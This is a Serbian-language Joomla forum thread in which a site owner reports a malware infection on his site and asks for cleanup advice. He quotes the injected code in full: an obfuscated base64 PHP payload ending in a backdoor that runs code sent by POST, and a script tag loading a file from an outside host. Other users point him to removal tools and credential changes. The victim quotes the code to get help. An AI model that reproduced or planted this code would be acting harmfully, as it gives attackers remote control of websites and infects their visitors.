-Apolls
-eXtplorer 2.0.1
-Jambook 1.0 RC1
-JCE 157
-JoomlaWatch
-Jumi 2.0.4
-Phoca Gallery 2.5.0
-Protect Config
(Instalirao sam properties 2.2.0721 i kunena 1.5.4 ali nema linkova ka ovaim extenzijama na front-u)

Jos je dodato i System - jSecure Authentication.

I mosets tree 2.1.0 (nll). Da nije mozda do mtree-a, ja sam bio protiv toga ali je prijatelj instalirao.

Vece izmene nisam vrsio, samo html prikaz u views. Drugo nista.

Jumi koristim za jednu mail formu.

Hvala na trudu.

janez84
Joomla! Apprentice
Joomla! Apprentice
Posts: 12
Joined: Fri Jan 29, 2010 10:02 pm

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by janez84 » Wed Feb 17, 2010 1:23 am

Evo i ja da kazem moj problem

Instalirao sam Joomlu 1.5 sa standardnim modulima i componentama joje idu uz to i naravno dodao sam moj tamplat i sve je funkcionisalo par nedelja i onda mi se pojavljuju virusi na sajtu google me naravno na trazilici iybaci sa stranom upozorenja OVAJ SAJT JE OPASAN ...itd.

Zatim ja zavucem rukave i otkrijem sledece

Napao me je virus odnosno skripta to samo index strane kako php tako i htm stim sto mi na php stranama pise sledece

Code: Select all

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnaW16cicpKXtmdW5jdGlvbiBpbXpyKCRzK
XtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2
goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCci
XVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtd
KFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzd
HJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpK
Skkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+X
So/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJH
YpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheV
xzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZW
dfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZ
TY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDNKdlkydGxibWRwYm1WekxtbHVabTh2Y
VcxaFoyVnpMMmRwWm1sdFp5NXdhSEFnUGp3dmMyTnlhWEIwUGc9PScpLCcnLCRzKTtpZihzdHJpc3R
yKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk
7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gaW16cjIoJGEs
JGIsJGMsJGQpe2dsb2JhbCRpbXpyMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkaW16cjEp
KWNhbGxfdXNlcl9mdW5jKCRpbXpyMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cyg
xKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0naW16cicpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGF
uZGxlcicpYnJlYWs7ZWxzZSRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYW
xzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29ud
GVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2ltenInKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JG
krKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kaW16cmw9KCgkYT1Ac2V0X2Vy
cm9yX2hhbmRsZXIoJ2ltenIyJykpIT0naW16cjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU
1RbJ2UnXSkpOw==')); ?>


a na htm sledece

<script src=http://rockengines.info/images/gifimg.php ></script>


e sada ja sam pokusao da to ispravim brisanjem svakog pojedinacno ali se on seta tako da mu ne mogu nista da li postoji neka zastita za joomlu za takve skripte nesto kao modul ili componenta i da li neko zna otkud ta skripta posto cu postaviti ponovo joomlu na server koji sam inace zakupio kod Verata, pa da ne pravim dva puta istu gresku.

Inace na kompu koristim avast i Malwarebytes' Anti-Malware, bio sam malo dugacak ali valjda i jasan

Hvala

User avatar
TheHacker
Joomla! Ace
Joomla! Ace
Posts: 1316
Joined: Sat Oct 13, 2007 1:12 pm
Location: Beograd
Contact:

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by TheHacker » Wed Feb 17, 2010 9:59 am

mnogo puta pisano o ovome...pretrazi malo.
Web Arena - Tutorijali - Photoshop, Joomla, JavaScript... zanimljivosti, inspiracija... http://webarena.rs

janez84
Joomla! Apprentice
Joomla! Apprentice
Posts: 12
Joined: Fri Jan 29, 2010 10:02 pm

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by janez84 » Wed Feb 17, 2010 12:21 pm

Ma znam da je pisano daj samo kratak uput gde da procitam ako znas nista vise,

User avatar
TheHacker
Joomla! Ace
Joomla! Ace
Posts: 1316
Joined: Sat Oct 13, 2007 1:12 pm
Location: Beograd
Contact:

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by TheHacker » Wed Feb 17, 2010 2:33 pm

pretrazi podforum bezbednost...sve ti je tu.
Web Arena - Tutorijali - Photoshop, Joomla, JavaScript... zanimljivosti, inspiracija... http://webarena.rs

janez84
Joomla! Apprentice
Joomla! Apprentice
Posts: 12
Joined: Fri Jan 29, 2010 10:02 pm

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by janez84 » Sat Feb 20, 2010 1:41 pm

Evo ovako procitao sam dosta toga, i uradio sam sledece prterazio i ocistio ceo komp na server ubacio skriptu curevir ali mi se posle nekoliko dana ponovo pojivala zlonamerna skritpa i sada cu morati 3 put za redom da obaram sajt.

Vise stvarno neznam sta da radim ako neko zna kako da resim problem i skratim muke neka kaze jer pocinjem da gubim i nerve i zivce oko ovog jer vise neznam sta da radim

janez84
Joomla! Apprentice
Joomla! Apprentice
Posts: 12
Joined: Fri Jan 29, 2010 10:02 pm

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by janez84 » Sat Feb 20, 2010 2:09 pm

Eto oborio sam sajt po treci put.

Sada da ne bih pocinjao ponovo nesto zanima me da li pored ovoga treba uraditi jos NESTO>

1. Preinstalirao sam komp
2. Promenio sam pass i user za ftp pristup
3. Ponovo skinuo novu joomlu *plasio sam se da je ona prethodna mozda zarazna*
4. Promenicu pass i user za ulaz u admin na joomli
5. Koristim FileZilla za ftp
6. Antivirus - Avast i Malwarebytes' Anti-Malware

DA LI JE POTREBNO JOS NESTO

User avatar
Tane
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 232
Joined: Fri Sep 30, 2005 2:01 pm
Location: Belgrade
Contact:

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by Tane » Sun Feb 21, 2010 4:21 pm

::: Vibe Yourself :::

janez84
Joomla! Apprentice
Joomla! Apprentice
Posts: 12
Joined: Fri Jan 29, 2010 10:02 pm

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by janez84 » Sun Feb 21, 2010 9:26 pm

Hvala ti Tane,

ali taj post sam vec procitao i postavio tu tool pomoć -- Gumblar-family virus removal tool -- o kojoj Telemah prica ali to nije funkcionisalo kod mene ja sam je skinuo postavio na server i posle nekoliko dana su se ponovo pojavljivale virus skrupte.

E sada, mozda sam ja nesto jos trebao da uradim ili sam u necemu pogresio, i sta je ovo - "dozvola za pisanje u fajlovima, potrebno je da su pristupacni kako bi skripta mogla da ih zaleci"- koju telemah pominje.

yorda86
Joomla! Intern
Joomla! Intern
Posts: 88
Joined: Thu Jul 16, 2009 4:51 pm
Location: Beograd
Contact:

Re: Virusi na sajtu - trebam vasu pomoc i savet

Post by yorda86 » Tue Feb 23, 2010 7:13 pm

Pregledaj sledece fajlove:

index.php, index.html,
default.php, default.html
i sve javascript falove (.js)

Poz
Please read forum rules regarding signatures: http://forum.joomla.org/viewtopic.php?t=65


Locked

Return to “Bezbednost”